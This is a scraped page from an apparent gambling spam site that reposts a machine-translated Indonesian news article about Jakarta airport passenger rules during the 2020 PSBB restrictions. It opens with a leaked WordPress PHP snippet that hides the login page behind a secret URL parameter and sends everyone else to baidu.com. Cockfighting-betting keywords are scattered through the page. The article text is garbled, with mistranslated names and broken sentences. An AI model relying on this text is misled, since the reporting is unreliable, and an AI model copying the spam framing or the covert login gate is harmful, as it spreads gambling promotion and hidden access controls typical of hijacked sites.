//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Harap dicatat bahwa berikut ini adalah aturan untuk perjalanan udara komersial selama PSBB | adu ayam bali_s128.net login_s128.live

Harap dicatat bahwa berikut ini adalah aturan untuk perjalanan udara komersial selama PSBB

Menurut reporter Tribunnews.com Fransiskus Adhiyuda, TRIBUNNEWS.COM – Biro Kesehatan Pelabuhan (KKP) Jakarta menetapkan aturan bagi calon penumpang pesawat komersial selama pembatasan sosial massal (PSBB). Bekerja keras untuk membantu pemerintah memutus rantai transmisi Covid-19.

Manajer bandara 1 KKP Bandara Soekarno-Hatta Anas Ma’ruf (Anas Ma’ruf) mengatakan bahwa peraturan tersebut telah disampaikan kepada Peraturan Menteri Perhubungan (Pemenhub) No. 18 tahun 2020 untuk mencegah penyebaran penyakit virus korona Pengendalian Transportasi 2019 (Covid-19).

Baca: Cara memperoleh SIKM, izin ekspor dan persyaratan masuk DKI Jakarta online selama PSBB

Permenhub, Edisi 25, 2020 Tentang Idul Fitri 1441 H Pengendalian transportasi di tahun kepulangan dan Surat Edaran Kelompok Kerja 2020 No. 4 untuk mempercepat pengelolaan co-19.

Baca: Masa depan dalam pandemi ini merekomendasikan agar penumpang udara menyelesaikan peraturan dokumen resmi, maka penerbangan hanya berlaku untuk calon penumpang yang perlu melakukan perjalanan bisnis resmi, bisnis pria dan warga negara Indonesia (WNI), yang baru saja kembali dari luar negeri. Negara itu mungkin dipulangkan.

Dalam hal ini, kondisi penumpang dipastikan harus dipenuhi sebelum naik.

“Menurut peraturan Permenhub pada tahun 2020, pembatasan penerbangan dibatasi. Satu-satunya izin penerbangan adalah logistik dan repatriasi (WNI) dari warga negara Indonesia. Kemudian ada Kelompok Kerja SE 4, yang hanya membuka penerbangan (komersial) tertentu Personil, seperti personil (resmi), “kata Anas kepada Graha National Disaster Management Bureau (BNPB) di Jakarta, Kamis (21 Mei 2020). .

Selama proses aplikasi, CTF memberlakukan tiga pemeriksaan atau pos pemeriksaan sebagai kondisi pada calon penumpang sebelum naik.

“Kami memantau dari pintu masuk ke pos pemeriksaan,” kata.

Leave a comment

adu ayam bali_s128.net login_s128.live